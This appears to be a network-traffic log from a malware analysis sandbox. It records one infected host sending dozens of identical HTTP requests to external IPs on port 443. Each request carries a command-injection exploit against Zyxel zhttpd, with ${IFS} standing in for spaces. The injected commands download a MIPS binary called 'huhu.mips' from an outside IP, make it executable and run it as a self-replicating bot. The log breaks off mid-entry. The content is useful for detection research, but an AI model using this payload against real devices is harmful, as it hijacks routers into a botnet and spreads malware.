                                                  Jan 19, 2024 18:24:13.398605108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8657192.168.2.134471431.118.122.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398638010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8658192.168.2.135985249.54.40.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398679018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8659192.168.2.1334730209.248.126.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398731947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8660192.168.2.1360838202.221.133.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398782969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8661192.168.2.1351432164.230.139.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398840904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8662192.168.2.1349050152.177.193.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398871899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8663192.168.2.133364618.81.131.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398924112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8664192.168.2.134080691.80.46.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398972034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8665192.168.2.13565224.240.254.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399003983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8666192.168.2.135013818.210.50.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399035931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8667192.168.2.1337908185.49.216.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399082899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8668192.168.2.1337386173.153.151.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399116993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8669192.168.2.1351594195.175.209.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399158955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8670192.168.2.1351914145.146.148.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399204016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8671192.168.2.133799212.65.83.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399249077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8672192.168.2.1345578114.194.215.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399271965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8673192.168.2.1345334184.192.158.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399339914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8674192.168.2.1348032100.182.184.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399378061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8675192.168.2.135634672.229.168.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399416924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8676192.168.2.1354328173.30.155.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399442911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8677192.168.2.1345674191.189.215.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399483919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8678192.168.2.134714059.153.62.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399519920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8679192.168.2.1340636111.121.24.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399571896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8680192.168.2.134175087.42.111.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399596930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8681192.168.2.1340882128.100.243.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399655104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8682192.168.2.1360888179.68.115.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399691105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8683192.168.2.1360900129.102.81.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399745941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8684192.168.2.13478325.231.112.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399766922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8685192.168.2.133872249.102.96.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399821997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8686192.168.2.1354322195.234.62.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399846077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8687192.168.2.135044040.41.185.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399871111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8688192.168.2.135656688.75.170.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399921894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8689192.168.2.134137486.255.8.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.399980068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8690192.168.2.135774053.69.233.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400031090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8691192.168.2.135634249.219.189.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400103092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8692192.168.2.136064847.122.88.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400129080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8693192.168.2.1353960212.115.106.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400181055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8694192.168.2.135300457.135.149.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400224924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8695192.168.2.1338380190.167.209.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400257111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8696192.168.2.1357938181.130.111.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400294065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8697192.168.2.1341648125.184.107.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400340080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8698192.168.2.1359216185.209.96.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400381088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8699192.168.2.134386439.180.150.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400413036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8700192.168.2.134075852.93.182.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400459051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8701192.168.2.1355512182.154.253.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400509119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8702192.168.2.1333850182.80.117.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400567055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8703192.168.2.1353966203.254.207.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400608063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8704192.168.2.134497275.83.183.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400665045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8705192.168.2.1344966219.220.37.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400713921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8706192.168.2.134378293.28.110.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400732994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8707192.168.2.134611076.59.73.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400790930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8708192.168.2.135885448.153.57.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400837898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8709192.168.2.1352830113.76.51.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400866985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8710192.168.2.1359768213.134.103.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400901079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8711192.168.2.135688269.23.3.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400933981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8712192.168.2.13337529.158.106.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.400991917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8713192.168.2.135518814.103.26.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401041985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8714192.168.2.1335524205.58.113.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401078939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8715192.168.2.13589202.185.36.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401134014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8716192.168.2.1340980159.129.92.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401170015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8717192.168.2.133724838.178.55.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401210070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8718192.168.2.13562129.203.40.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401241064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8719192.168.2.1333604183.49.39.112443
                                                  TimestampBytes transferredDirectionData
